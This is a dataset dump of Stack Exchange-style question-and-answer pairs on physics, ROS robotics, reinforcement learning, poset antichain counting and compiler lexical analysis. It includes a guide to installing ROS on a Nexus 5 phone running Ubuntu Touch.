anchor
stringlengths
0
150
positive
stringlengths
0
96k
source
dict
Index manipulation in Lorentz scalars
Question: I have been trying to show that: $ \vec{B}^{2} - \vec{E}^{2} =\frac{1}{2} f^{\mu \nu }f_{\mu \nu}$ where $\vec{B}^{2}$ and $\vec{E}^{2}$ are the square of the magnitude of the magnetic field and electric field respectively, and $f^{\mu \nu }$ is the electromagnetic tensor. so far i have tried this: $\vec{B}^{2} - \vec{E}^{2} = \frac{1}{4}(\varepsilon^{ijk}f_{jk} )(\varepsilon_{imn}f ^{mn} )- f^{0l}f_{l0} = \frac{1}{4}(\delta_{m}^{j} \delta_{n}^{k} - \delta_{n}^{j} \delta_{m}^{k})f_{jk}f ^{mn} + f^{l0}f_{l0}$ where i used the following properties $B^{i} = \frac{1}{2}\varepsilon^{ijk}f_{jk}$ $\varepsilon_{imn} \varepsilon^{ijk} = (\delta_{m}^{j} \delta_{n}^{k} - \delta_{n}^{j} \delta_{m}^{k}) $ $f^{\mu \nu }=-f^{\nu \mu }$ then: $=\frac{1}{4}(f_{mn}f^{mn}-f_{nm}f^{mn})+ f^{l0}f_{l0}= \frac{1}{2}f_{mn}f^{mn}+ f^{l0}f_{l0}$ what mistake did i make? Answer: It's not so much that you made a mistake as that you missed the significance of what you found. Note that$$\begin{align}\frac12(f_{\mu\nu}f^{\mu\nu}-f_{mn}f^{mn})&=\frac12(\underbrace{f_{00}f^{00}}_0+f_{0l}f^{0l}+f_{l0}f^{l0}+\underbrace{f_{mn}f^{mn}-f_{mn}f^{mn}}_0)\\&=\frac12(f_{l0}f^{l0}+f_{l0}f^{l0})\\&=f_{l0}f^{l0}.\end{align}$$
{ "domain": "physics.stackexchange", "id": 86826, "tags": "homework-and-exercises, electromagnetism, tensor-calculus, covariance" }
ros distro "N" version not released?
Question: As it says here http://wiki.ros.org/Distributions Every May it is expected to be published a ros version. I know that we have ros2 Dashing Diademata, but if I am not wrong they are independent releases (at least it has a specific distro page (https://index.ros.org/doc/ros2/Releases/) . I just use LTS versions of ros but, I am quite curious. Does anybody know something? Maybe they are deciding to remove the non LTS version to focus more in ros2 ? Thanks in advance. Originally posted by Solrac3589 on ROS Answers with karma: 187 on 2019-06-07 Post score: 0 Answer: See https://discourse.ros.org/t/planning-future-ros-1-distribution-s/6538 for the plan for Noetic which is targeted for May 2020. Since non-LTS releases have never been used much there is no ROS 1 release in 2019. Edit: the Distributions/ReleasePolicy page has been updated (diff). Originally posted by Dirk Thomas with karma: 16276 on 2019-06-07 This answer was ACCEPTED on the original site Post score: 1 Original comments Comment by gvdhoorn on 2019-06-07: Should the Distributions page not be updated to reflect this? Comment by Dirk Thomas on 2019-06-07: Yes, that would be good. Comment by gvdhoorn on 2019-06-07: Your answer implies you / OR are not going to do that. Is that correct? Comment by Dirk Thomas on 2019-06-07: I will delegate it to the ROS boss of Noetic. So it will get updated. Comment by gvdhoorn on 2019-06-07:\ ROS boss nice one. So it will get updated. Ok, great. It's not that 'others' don't know how to edit a wiki page, but it'd be good to have an authoritative source do that. Just so we don't communicate more incorrect information. Comment by Dirk Thomas on 2019-06-07:\ ROS boss That is more of an internal name than an official title though ;-) Comment by gvdhoorn on 2019-06-07: Hm. So no business cards then ? ;) Comment by Solrac3589 on 2019-06-14: Thanks! :) Comment by gvdhoorn on 2019-06-14: Could you click the checkmark to the left of the answer to mark it as answered?
{ "domain": "robotics.stackexchange", "id": 33141, "tags": "ros, release" }
Lower bound of stable equilibrium for mass on rotating ring
Question: Consider a point mass $m$ constrained to move without friction along a ring of radius $R$. The ring rotates with angular frequency $\omega$ about the $z$-axis which runs through a diameter of the ring, with the origin at the ring's center. There is a uniform gravitational field with acceleration $g$ in the negative $z$-direction. The Lagrangian with a generalized polar coordinate $\theta$ is $$L = \frac{1}{2}mR^2(\dot{\theta}^2+\omega^2 \sin^2\theta)-mgR\cos\theta$$ and the equation of motion $$\ddot{\theta} - \sin\theta\left(\frac{g}{R}+\omega^2\cos\theta\right) = 0$$ The point of stable equilibrium is $\theta=\theta_0$ for $$\cos\theta_0 = \frac{-g}{R\omega^2} \geq -1$$ What does the lower bound $g=R\omega^2 \Rightarrow \theta_0=\pi$ correspond to physically? Answer: $\theta =\pi$ is always the equilibrium point in this problem. If $g> R\omega^2$, then this equilibrium point is stable and there are no other stable equilibrium points. If $g <R\omega^2$, then $\theta = \pi$ is an unstable equilibrium point. So, the physical picture looks like this. If the frequency $\omega$ is not large enough, then the point mass is in the lowest position, otherwise the centrifugal force forces the mass to occupy a higher position. The value $\omega = \sqrt{g/R}$ corresponds to the loss of stability of the equilibrium point $\theta = \pi$.
{ "domain": "physics.stackexchange", "id": 97015, "tags": "classical-mechanics, equilibrium" }
Can a policy with gaussian distribution allow two distinct optimal actions to have distinctively high probabilities?
Question: As an example to show the benefits of stochastic policy, I often have seen the below grid world example. Five blocks in a row. the first, third, and fifth are white(distinguishable states), and the second and fourth are gray(for agent, these two states are equivalent, non-distinguishable). positive reward if goes down in the middle state, negative reward if goes down in the first and the fifth states. They often say, in the gray region, it's best to put 0.5 probability to each left and right actions and it is possible only by stochastic policies. Let Left = 0, Down = 1, and Right = 2 be action values. Let those three actions, left, down, right be available for all states, that down action in gray state will just let it stay with negative reward. My question is, for the gray region, if we use gaussian distribution for our policy, can we set up 0.5 probability for each left and right action? wouldn't it naturally make the probability to choose down action quite high as we only modify mean and variance value? I just thought it's interesting that most RL paper seems to use gaussian distribution for stochastic policy but that distribution cannot even solve this simple setup, which is often used in teaching the benefits of stochastic policy. Or, am I wrong? Answer: Assuming by distinct you mean that, for example, the euclidean distance between the two actions is sufficiently large, then no it cannot be true. This is because the Normal distribution is uni-modal. There is an interesting paper that uses this fact as motivation to replace Normally distributed action selection in on-policy optimisation of MuJoCo tasks with discretised variants since a discrete (e.g. softmax) distribution can be multi-modal. An alternate to discrete actions could be to use a mixture of Gaussians. This allows the modelling of multiple-modes, and in particular if you have prior information about your action space that informs you how many modes there are likely to be, it goes a long way to knowing how many Gaussians in the mixture you'd need. An example of this being used, whilst not directly to parameterise the action distribution, is in Distributional RL, where the returns are modelled as a probability distribution. The authors of this paper look to use MoG as an alternative to the commonly used C51 parameterisation (modelling the returns with a discrete distribution of 51 evenly spaced atoms) since this typically requires knowing the lower/upper bounds of your returns, whereas MoG is defined over the whole real line so doesn't require this prior information. For what it's worth, a Normally distributed policy would not be applicable to the example you have given, since this looks to be an environment with a discrete action space.
{ "domain": "ai.stackexchange", "id": 4207, "tags": "reinforcement-learning, stochastic-policy" }
Are there Windows Compatible ROS nodes?
Question: I am trying to write a program in Windows that is able to send packets to a ROS node. It does not necessarily have to be a Windows node, just a program that runs on a Windows machine and can send ROS (linux) -compatible packets for another computer running Linux to handle/receive those packets via a ROS node. Does roscore (the 'Master' node) influence this in any way? Originally posted by doullylogo on ROS Answers with karma: 38 on 2016-07-25 Post score: 0 Answer: Publishing and subscribing to ROS topics is not just a matter of sending properly-formatted packets. Your program also needs to communicate with the ROS master to advertise its topic, and it needs to negotiate the topic setup when other ROS nodes want to subscribe to that topic. The technical overview goes through the details of topic setup if you're interested. Instead of running a full publisher on your windows machine, you can run a ROS node which bridges a simpler transport mechanism into ROS. Two of the more popular approaches for this are: Encode your messages as JSON and communicate over a websocket to rosbridge. (easy) Use rosserial_windows to tunnel messages over TCP to the rosserial_server. (better performance) Originally posted by ahendrix with karma: 47576 on 2016-07-25 This answer was ACCEPTED on the original site Post score: 1 Original comments Comment by sdcguy on 2018-02-28: Hi I have been trying to do this Using JSON over rosbridge, But haven't been able to figure it out. I tried to just create a Python script on Windows and connect to the port that rosbridge is running on and listen for JSON queries. And it just didn't work. Is this the right approach or not? Comment by ahendrix on 2018-03-01: This question has already been answered. If you're having a specific problem, please ask a new question and include a description of your network, your code, a description of what you expect it to do and a description of what it actually does.
{ "domain": "robotics.stackexchange", "id": 25350, "tags": "ros, nodes" }
Is it possible to use a balloon to float so high in the atmosphere that you can be gravitationally pulled towards a satellite?
Question: A recent joke on the comedy panel show 8 out of 10 cats prompted this question. I'm pretty sure the answer's no, but hopefully someone can surprise me. If you put a person in a balloon, such that the balloon ascended to the upper levels of the atmosphere, is it theoretically possible that an orbiting satellite's (i.e. a moon's) gravity would become strong enough to start pulling you towards it, taking over as the lifting force from your buoyancy? Clearly this wouldn't work on Earth, as there's no atmosphere between the Earth and the moon, but would it be possible to have a satellite share an atmosphere with its planet such that this would be a possibility, or would any shared atmosphere cause too much drag to allow for the existence of any satellite? If it were possible, would it also be possible to take a balloon up to the satellite's surface, or would the moon's gravity ensure that its atmosphere was too dense near the surface for a landing to be possible thus leaving the balloonist suspended in equilibrium? Could you jump up from the balloon towards the moon (i.e. jumping away from the balloon in order to loose the buoyancy it provided). http://www.channel4.com/programmes/8-out-of-10-cats/4od#3430968 Answer: No, a shared atmosphere between body and moon is not possible. For a natural satellite to remain, the orbit must be very stable, because those satellites exist for billions of years. Even the tiniest bit of atmosphere (a few molecules) would cause a tiny drag. However, drag adds up, so over a long time period, even a heavy object (such as the moon) would be dragged down due to drag and ultimately collide with the body it is rotating around. A balloon needs a quite significant atmosphere to be used. Present balloons can reach up to 30–35 km altitude. Since atmospheric density (in the heterosphere) drops off exponentially with elevation, balloons would get gigantic even to reach a little bit higher. Reaching an elevation where the atmosphere has negligible density is, in a balloon, impossible. One can however, in theory, try to go as high as possible with a balloon, and then use other methods (such as rockets) from there, thus bypassing the densest part of the atmosphere and save a lot of fuel. Edit: one more way to look at it: if a satellite would have enough gravitational pull to pull up an observer in a balloon, it would certainly pull up the atmosphere; therefore the satellite would be in the atmosphere, which is impossible. Therefore, a a satellite can never have enough gravitational pull to pull up an observer inside the atmosphere.
{ "domain": "physics.stackexchange", "id": 5196, "tags": "forces, newtonian-gravity, atmospheric-science, earth" }
Reading a yes/no answer from std::cin
Question: Based on this question, I wrote my own implementation of the yesno function I suggested. The function reads an answer until it is either "y" or "yes" or "n" or "no" (case-insensitive). #include <algorithm> #include <cctype> #include <cstdlib> #include <iostream> #include <string> bool yesno(const std::string &prompt) { while (true) { std::cout << prompt << " [y/n] "; std::string line; if (!std::getline(std::cin, line)) { std::cerr << "\n"; std::cerr << "error: unexpected end of file\n"; std::exit(EXIT_FAILURE); } std::transform(line.begin(), line.end(), line.begin(), [](unsigned char x){return std::tolower(x);}); if (line == "y" || line == "yes") { return true; } if (line == "n" || line == "no") { return false; } } } int main() { bool include_digits = yesno("Should the password include digits?"); if (include_digits) { std::cout << "le1mein\n"; } else { std::cout << "letmein\n"; } } I took care to: Include all necessary headers. Call the std::tolower function with an unsigned char as argument. Use std::getline instead of the hard-to-control >> operator. Catch all errors (except for writing to std::cout). Anything that I missed? Answer: Good job in general, mad props for proper use of cout vs cerr. I don't see any "errors" per se, but I do see a few things I personally would have done a bit differently. Opinion: Not a big fan of std::exit() in anything but main() A function is supposed to be decontextualized, and having a "will crash the whole program if it fails" as part of the function's contract is just too aggressive in my opinion. Personally, I'd rather just throw an exception instead. It accomplishes the same thing, and it lets users of the function choose how to handle failures. Opinion: maybe have a separate prompt for failure? I would personally explain to the user why he is being asked the same question twice when the input fails to match either criteria. Opinion: std::transform is overkill here This is a personal bias, as I find in-place usage of std::transform uncomfortable at best, since a range-based for does as good a job in a much more legible manner. Specifically: Having to read the third parameter to understand that it's an inplace transform is just unnecessary cognitive load. I find the following easier to parse: for(auto& x : line) { x = std::tolower(static_cast<unsigned char>(x)); }
{ "domain": "codereview.stackexchange", "id": 28339, "tags": "c++" }
How are lexical tokens produced
Question: I am studying Compiler Design. The instructor told us that when a program is given to lexical analyzer it find all tokens then a symbol table is created and it is updated at every phase accordingly, but I read this online notes and here is the statement The lexical analyzer produces a single tokens each time it is called by the parser. I can't understand this statement. How does all this stuff happens? For a program with thousands line of code there may be thousands of tokens and for every token if the parser calls the lexical analyzer this may be very much time consuming? How does parser decide that all tokens are produced and it don't need to call lexical analyzer now? I am asking this for general compiler not a language specific. Answer: Yes, normally a parser calls the lexical analyser every time it needs a token, and this results in many, many, many calls to the lexical analyser. It is well known by compiler writers that the lexical analysis can consume the larger proportion of the compilers execution time. However, the lexical analysis process would normally use a Chomsky type 3 grammar, or a regular language, and thus can be implemented by a finite state automaton, which can be coded quite efficiently. The parser, by contrast, will normally be based on some form of Chomsky type 2 (context free) grammar and the algorithm would be less efficient as it may involve back-tracking or rule matching. Thus devolving some work from the less efficient parser to the more efficient lexical analyser makes the whole compiler more efficient. It is possible also to implement the relationship between the lexical analyser and the parser in a different way. The lexical analyser could process the whole input source program from a file (of text) into a complete set of tokens, which could themselves be stored in a file. Then the parser could input that file of tokens. This would be slower because it involves the writing and reading of a file. The list of tokens could alternately be stored in memory, but now the compiler has a larger memory requirement. Historically, in early computers, with smaller memories and slower processors it was done in a similar way and perhaps the input (tape) of the source program resulted in an output (tape) of token which becomes the input (tape) of the parser program! On a modern system this could be implemented in a pipe, for example: lexer sourcefile.lng | parser | optimiser | codegen > program.exe Internally, some compilers could implement it this way, but normally a parser (function) within the compiler calls a lexer (function) as described.
{ "domain": "cs.stackexchange", "id": 18670, "tags": "compilers, parsers, lexical-analysis" }
State counting in the d = 1+2, $\cal{N} = 2$ vector multiplet
Question: The question is from Box 8.2, page 282 of the book "Gauge Gravity Duality" by Ammon and Erdmenger. The link to the specific page from Google Books is here. According to the authors, a $\mathcal{N} = 2$ vector superfield includes a vector potential $A_\mu$, a real scalar field $\sigma$, two real (Majorana) gauginos, and an auxiliary real scalar field $D$, all in the adjoint representation of the gauge group. I am not sure how the counting works: Vector potential $A_\mu$ has $(3-2) = 1$ (bosonic) degree of freedom, as a gauge field in $d = 1 + 2$ dimensions. A real scalar field has $1$ (bosonic) degree of freedom. Two real Majorana gauginos have $2 \times 2^{(3-1)/2}$ (real) fermionic degrees of freedom, i.e. $4$ fermionic degrees of freedom. An auxiliary real field has $1$ bosonic degree of freedom. The number of fermionic and bosonic components do not match. Answer: You are performing an on-shell counting for an off-shell multiplet. The off-shell vector multiplet has $\sigma [1], A_{\mu} [2], D[1], \lambda [4]$ thus $4+4$ degrees of freedom. The on-shell vector multiplet consists of the scalar $\sigma$, the vector $A_\mu$ and the Dirac fermion $\lambda$. In that case, the counting is $\sigma [1], A_{\mu} [1], \lambda [2]$ so you have $2+2$ degrees of freedom.
{ "domain": "physics.stackexchange", "id": 27922, "tags": "supersymmetry, field-theory, degrees-of-freedom, superspace-formalism" }
My exact divide-conquer algorithm for counting antichain in a poset?
Question: This post is a little lengthy, thank your for your patience for reading. ^_^ As known, counting antichains in a poset is #P-complete, so it is NP-hard to get the exact answer. Following is my simple divide-conquer algorithm for the antichain counting problem (#ANTICHAIN). I wonder if more helpful properties releavnt to my algorithm could be found? And whether the worst condition may happen? We represent the poset as a DAG. Notice: We can assume that $G$'s underlying undirected graph is connected. Otherwise, we can calculate each connected component and just multiply the number of each component. Also, we assume that $G$ is transitive reduction of itself, i.e, $G$ is free of transitive edge. Consider a vertex $u$ of $G$, let $R^+[u]=\{ v | u \leadsto v \}$ denote the set of vertices which are reachable from $u$, including $u$ itself. Similarly, let $R^-[u]=\{ v | v \leadsto u \}$. When $u$ is selected as a member of an antichain, $R^+[u]$ is excluded from further selection, i.e., $G \leftarrow G-R^+[u]$. Just delete $R^+[u]$ and any edge which has an head (ending-point) in $R^+[u]$ from $G$. When $u$ is not selected, $R^-[u]$ is excluded from further selection, i.e., $G \leftarrow G-R^-[u]$. Just delete $R^-[u]$ and any edge which has an tail (starting-point) in $R^-[u]$ from $G$. Let $|R^+[u]|=a$ and $|R^-[u]|=b$, then the recurrence relation is at least as good as $$T(n)=T(a)+T(n-a)+T(b)+T(n-b) \text.$$ Why at least? Because the underlying undirectd graph of $G-R^+[u]$ or $G-R^-[u]$ may be disconnected. For a DAG, let ${\Delta^-}(G)$ and ${\Delta^+ }(G) $ represent the maximum indegree and outdegree of vertices of $G$. If ${\Delta ^ - }(G) \le 1$ and ${\Delta ^ + }(G) \le 1$ , then #ANTICHAIN is in $\mathcal{O}(n)$. Otherwise, my algorithm satisfies the recursion $$T(n)=T(n-1)+T(n-3) \text,$$ nearly $\mathcal{O}(1.45^n)$. I wonder whether the recursion is tight? Does there exists a DAG when using my simple divide-conquer algorithm, the running time is $T(n)=T(n-1)+T(n-3)$? This algorithm is really kind of stupid. Are there more elegant, effective algorithm exist already? Has anyone thought about the possible FPRAS of it? Or has prove that #ANTICHAIN does not have a FPRAS? Wow, closed. Sincerely thanks for your answer/comment in advance. ^_^ Answer: Counting antichains in an $n$ element poset is equivalent to counting independent sets in a comparability graph on $n$ vertices. The problem of counting the independent sets in an $n$ vertex graph has an $O(1.2461^n)$ time algorithm, see Fürer and Kasiviswanathan http://eccc.hpi-web.de/report/2005/033/ .
{ "domain": "cstheory.stackexchange", "id": 1027, "tags": "cc.complexity-theory, ds.algorithms, graph-theory, co.combinatorics, partial-order" }
What is the difference between a complex scalar field and two real scalar fields?
Question: Consider a complex scalar field $\phi$ with the Lagrangian: $$L = \partial_\mu\phi^\dagger\partial^\mu\phi - m^2 \phi^\dagger\phi.$$ Consider also two real scalar fields $\phi_1$ and $\phi_2$ with the Lagrangian: $$L = \frac12\partial_\mu\phi_1\partial^\mu\phi_1 - \frac12m^2 \phi_1^2 +\frac12\partial_\mu\phi_2\partial^\mu\phi_2 - \frac12m^2 \phi_2^2.$$ Are these two systems essentially the same? If not -- what is the difference? Answer: There are some kind of silly answers here, except for QGR who correctly says they are identical. The two Lagrangians are isomorphic, the fields have just been relabeled. So anything you can do with one you can do with the other. The first has manifest $U(1)$ global symmetry, the second manifest $SO(2)$ but these two Lie algebras are isomorphic. If you want to gauge either global symmetry you can do it in the obvious way. You can use a complex scalar to represent a single charged field, but you could also use it to represent two real neutral fields. If you don't couple to some other fields in a way that allows you to measure the charge there is no difference.
{ "domain": "physics.stackexchange", "id": 63156, "tags": "quantum-field-theory, lagrangian-formalism, field-theory, complex-numbers" }
Where do black holes go?
Question: According to many physicists, any matter near a black hole is obviously gravitated towards it, and transported to a parallel universe. As far as i know, black holes are made up of material particles, as is everything else in the universe, so why isn't it sucked up in the parallel universe? And if it is true that it sucks up everything and transports it to a parallel universe, shouldn't it be bright in that parallel universe, as light is also pulled into it? If so, why doesn't our universe have these? Answer: It's a common claim that certain types of black holes provide a gateway to a parallel universe, however there are two problems with this claim. Firstly, although it's true that trajectories can be traced through the event horizon and back out again, it isn't clear whether this is physically meaningful or just a mathematical trick. In fact if recent suggestions about firewalls are correct anything crossing the event horizon will simply be incinerated. Secondly, even if the trajectories are physically meaningful and firewalls don't get in the way, the universe you reach is not a parallel universe but just a causally disconnected bit of the same universe you and I live in. Lastly, even if you can travel through the black hole to reach a causally disconnected bit of the universe, for any observer outside the black hole the trip will take an infinite time. So we could only see something emerge from a black hole if the black hole was infinitely old. Clearly this isn't the case. You might be interested to have a look at my answer to Entering a black hole, jumping into another universe---with questions where I go into more detail about the travel through a black hole. Also in that answer I mention the book The Cosmic Frontiers of General Relativity by William J. Kaufmann and this book deals with your question. From outside the event horizon you can't see anything travelling out of the black hole, but if you jump into the black hole then in principle once inside the event horizon you could see light coming from other parts of the universe, or from parallel universes if you wish to describe them so.
{ "domain": "physics.stackexchange", "id": 6529, "tags": "black-holes, quantum-teleportation, multiverse, white-holes" }
Cannot convert ros::Subscriber to float
Question: Hello, I have the Problem: error: cannot convert ros::Subscriber to float in assignment I used 2 Subscirber to listen to my velocities and i want to get this as an float but it doesn't work. #include "ros/ros.h" #include "std_msgs/Float64.h" #include <can_msgs/Frame.h> #include <socketcan_bridge/topic_to_socketcan.h> #include <socketcan_interface/socketcan.h> class VehicleDynamics { public: VehicleDynamics() { sub_vel_left= n.subscribe<std_msgs::Float64>("left_velocity_controller/command",1, &VehicleDynamics::velCallback, this); sub_vel_right= n.subscribe<std_msgs::Float64>("right_velocity_controller/command",1, &VehicleDynamics::velCallback, this); pub_ = n.advertise<can_msgs::Frame>("sent_messages", 10); } float calculate() { static const float calcReduc = m_reduc * 16.6666666f; static const float calcDiameter = (m_diameter * M_PI) / 1000.0f; velocity_rpm = ((left_wheel+right_wheel)/ 2); return (velocity_rpm* calcDiameter/calcReduc); } void velCallback(const std_msgs::Float64::ConstPtr& float_msgs) { n.getParam("MobileResearchPlattform/motor/nominal_speed",m_max_velocity); n.getParam("MobileResearchPlattform/geometry/wheel_diameter",m_diameter); n.getParam("/MobileResearchPlattform/motor/reduction",m_reduc); left_wheel=sub_vel_left; right_wheel=sub_vel_right; velocity_kmh = calculate(); can_msgs::Frame msg; msg.is_extended = false; msg.is_rtr = false; msg.is_error = false; msg.id = 0x220; msg.dlc = 8; msg.data[1] = velocity_kmh; msg.header.frame_id = "0"; // "0" for no frame. msg.header.stamp = ros::Time::now(); // send the can_frame::Frame message to the sent_messages topic. pub_.publish(msg); } private: ros::NodeHandle n; ros::Publisher pub_; ros::Subscriber sub_vel_left; ros::Subscriber sub_vel_right; float velocity_rpm; float velocity_kmh; float left_wheel; float right_wheel; float m_max_velocity; float m_diameter; int m_reduc; }; int main(int argc, char **argv) { ros::init(argc,argv,"VehilceDyn"); VehicleDynamics SAPObject; ros::Rate loop_rate(10000); ros::spin(); return 0; } Originally posted by Milliau on ROS Answers with karma: 33 on 2017-01-24 Post score: 0 Answer: The subscriber is a subscriber and not a float value. You can find the float value in the msg you receive. In your case, you need two callback functions in which you can access your float as float_msgs->data. So create two callbacks (leftVelCb, RightVelCb) and read the corresponding msg. Originally posted by NEngelhard with karma: 3519 on 2017-01-24 This answer was ACCEPTED on the original site Post score: 0 Original comments Comment by Milliau on 2017-01-24: ok, so i have two make a function like this: void velLeftCallback(const std_msgs::Float64::ConstPtr& float_msgs) { float_msgs->data; } is that right? and where i can definded in which variable I write the data? Comment by NEngelhard on 2017-01-24: just assign it,,, (float left_vel = float_msgs->data;}
{ "domain": "robotics.stackexchange", "id": 26815, "tags": "ros" }
Does this motor move?
Question: Say we have a motor coil like this: We hang a mass (red ball) on the motor to prevent it's rotation. We make the mass heavy enough such that it's Weight Force directly opposes the motor force produced by that wire. $$mg = BIL$$ Does this motor turn? I feel like the answer is no, because that wire has no net force acting on it (forces cancel out). However, there still is a force being produced by the right hand wire (next to the N pole). It feels like this force should still be able to make the coil turn. Answer: Answer: Yes, motor's coil will turn. Notice, the magnetic field $B$ exerts a force $=BIL$ to the right hand wire in vertically downward direction (given by Fleming left hand rule). Similarly, it exerts an equal force $=BIL$ on left hand wire in vertically upward direction. These two equal and opposite forces for a couple which have tendency to turn the coil of motor depending on the magnitude of net turning moment. $$\text{Turning moment acting on the coil}=BIL\times d$$ $$\text{Opposing moment prouced by weight}, (mg=BIL)=mg\times \frac{d}{2}=BIL\times \frac d2$$ $$\implies BIL\times d>mg\times \frac{d}{2}$$ Since, turning moment is greater than opposing moment by weight $mg$ Hence the coil will certainly turn.
{ "domain": "physics.stackexchange", "id": 68641, "tags": "electromagnetism" }
ros on google nexus 5
Question: Hi, I just installed ros on a google nexus 5 using Ubuntu touch as operation system for the phone. The results are currently promising, hence I like to share them. I wrote down the steps to perform and want to create a wiki page someday. Currently I have a running ros on the phone and can communicate with ros core (running remote control of the turtlesim on the phone). The next steps I like to add are: Cross compile environment Accessing sensors (GPS and IMU) of the phone Is there something I missed? What is interesting for you? Do you have technical remarks and hints, especially the hacks. Is there something to test? Regards, Georg Changelog: added kinect Introduction This guide describes how to install ros on a google nexus 5 smartphone with Ubuntu touch. When the guide was written (15 / 04) I used the development version for Ubuntu phone (vivid). After installation android will be erased completely. I did not test the phone functionality of Ubuntu touch but suppose that LTE is working. The precondition for the installation is a working wireless environment with dhcp and a PC with installed Ubuntu (I used 14.10 utopic). Installation of Ubuntu touch on the phone First it is necessary to install Ubuntu Phone on the device. For installation I used the guide here [https://developer.ubuntu.com/en/start/ubuntu-for-devices/installing-ubuntu-for-devices/] without big problems. To flash the device the following command sets the phone into developer mode and adds a password. ubuntu-device-flash --channel="ubuntu-touch/devel" --bootstrap --server="http://system-image.tasemnice.eu" --password=1234 --developer-mode Sometimes the flashing does not succeed and fails without error, when that happens it is necessary to retry the above command. If you are no developer yet make sure to get one and set your password (described in the how to above). The next step is to make the image on the phone writable. phablet-config writable-image The device reboots and you can configure ssh. Enabling ssh: adb shell android-gadget-service enable ssh Copy your public key to the Phone: adb shell mkdir /home/phablet/.ssh adb push ~/.ssh/id_rsa.pub /home/phablet/.ssh/authorized_keys adb shell chown -R phablet.phablet /home/phablet/.ssh adb shell chmod 700 /home/phablet/.ssh adb shell chmod 600 /home/phablet/.ssh/authorized_keys Now you can look up your IP on the phone and use ssh to connect: adb shell ip addr show wlan0|grep inet ssh phablet@ubuntu-phablet [or IP] You are ready to start the installation of ros: Installation of ros When you ssh on the phone it behaves like a normal Ubuntu vivid. Preparation of the device Unfortunately the partitions of the phone are unhandy for our purposes. The root partition has a size of about 2GB which is not sufficient to install ros. It was not possible to find a tidy way to re-size the root partition, hence I used the hack found here [http://askubuntu.com/questions/514913/how-to-get-a-larger-root-partition-on-touch], which copys /usr and /opt into the home partition and binds them on boot. Following commands are executed as root (indicated by the # in front of the commands). sudo bash # cd /usr # find . -depth -print0 | cpio --null --sparse -pvd /home/usr/ # cd /opt # find . -depth -print0 | cpio --null --sparse -pvd /home/opt Create a script (nano is present) at /etc/init.d/bind.sh to mount and bind the moved directory on boot (see original link for explanation) #!/bin/sh if [ "X$1" = "Xstart" ]; then echo "Binding /home/usr to /usr..." chmod 4755 /home/usr/bin/passwd /home/usr/bin/chsh /home/usr/bin/pkexec /home/usr/bin/sudo /home/usr/bin/newgrp /home/usr/bin/gpasswd /home/usr/bin/chfn /home/usr/lib/pt_chown /home/usr/lib/eject/dmcrypt-get-device /home/usr/lib/openssh/ssh-keysign /home/usr/lib/dbus-1.0/dbus-daemon-launch-helper /home/usr/lib/policykit-1/polkit-agent-helper-1 /home/usr/lib/arm-linux-gnueabihf/oxide-qt/chrome-sandbox /home/usr/lib/arm-linux-gnueabihf/lxc/lxc-user-nic mount -o bind,suid /home/usr /usr echo "Binding /home/opt to /opt..." mount -o bind,suid /home/opt /opt echo "...done" fi and do not forget to make the script executable # chmod 755 /etc/init.d/bind.sh To execute the script add a symbolic link in the start folder # ln -s /etc/init.d/bind.sh /etc/rcS.d/S13bind.sh Install 3rd party software sudo apt-get update sudo apt-get install bash-completion vim Install ros Ubuntu phone uses vivid as its distribution hence not all ros dependencies are met (boost, avcodec). To solve that issue it is necessary to add trusty sources as sources. That is a hack somehow, but currently I did not run into dependency hell. To install indigo base you need following sources from trusty to hit dependencies: sudo sh -c 'echo "deb http://ports.ubuntu.com/ubuntu-ports/ trusty main restricted" > /etc/apt/sources.list.d/trusty.list' For some other packages (currently I just installed usb_cam) you need these sources sudo sh -c 'echo "deb http://ports.ubuntu.com/ubuntu-ports/ trusty universe" >> /etc/apt/sources.list.d/trusty.list' Now you can add ros sources and the ros key sudo sh -c 'echo "deb http://packages.ros.org/ros/ubuntu trusty main" > /etc/apt/sources.list.d/ros-latest.list' wget https://raw.githubusercontent.com/ros/rosdistro/master/ros.key -O - | sudo apt-key add - and start installation the installation sudo apt-get update sudo apt-get install ros-indigo-ros-base -> Now proceed with the normal ros installation of ros Installation of kinect The installation of a kinect v1 was quite easy. sudo apt-get install ros-indigo-freenect-stack Add following line to /etc/rc.local to change permission of the kinect #... # By default this script does nothing. chmod 777 -R /dev/bus/usb exit 0 The /opt/ros/indigo/share/freenect_launch/launch/freenect.launch file of the freenect stack is broken for the installed arm (Version 0.3.2). To fix it I replaced it with freenect.launch from my x86 installation (Version 0.4.1). To start it just run roslaunch freenect_launch freenect.launch I am quite disappointed because the performance is quite poor, but I will try to improve that. Originally posted by georg l on ROS Answers with karma: 186 on 2015-04-08 Post score: 6 Original comments Comment by dornhege on 2015-04-08: This looks awesome! The only other comment I have: This page is more for actual questions. Yours is already a tutorial. I would highly encourage you to copy this into a wiki page. The ros-users mailing list would be the best place to announce that. Comment by 130s on 2015-04-09: I second to @dornhege. I like to see this great work as a tutorial on ros wiki! Answer: Thank you for testing. Did you run apt-get upgrade or other updates on your phone? Are you sure the bind script is executed and /usr is mounted? df -ah | grep usr The output shall look like: /dev/mmcblk0p28 27G 3.7G 22G 15% /usr Is there a /usr/lib/python2.7/py_compile.py? To fix your system you could try: sudo apt-get install -f If that fails you could try sudo dpkg-reconfigure python2.7-minimal sudo dpkg-reconfigure python2.7-python2.7 sudo dpkg --configure -a sudo apt-get install -f What do you plan with the phone. Depending on your input I will improve the installation howto. Originally posted by georg l with karma: 186 on 2015-04-12 This answer was ACCEPTED on the original site Post score: 2 Original comments Comment by JollyGood on 2015-04-16: I've got the similar output as yours when typing df -ah | grep user. And I tried your suggestions, but it did not work. So, I re-installed ubuntu and then installed python2.7-dev before binding /usr, /opt. Then everything worked smoothly. Thank you for your help.
{ "domain": "robotics.stackexchange", "id": 21381, "tags": "robotic-arm, ros, kinect, installation, ubuntu" }
Transformations that preserve the metric
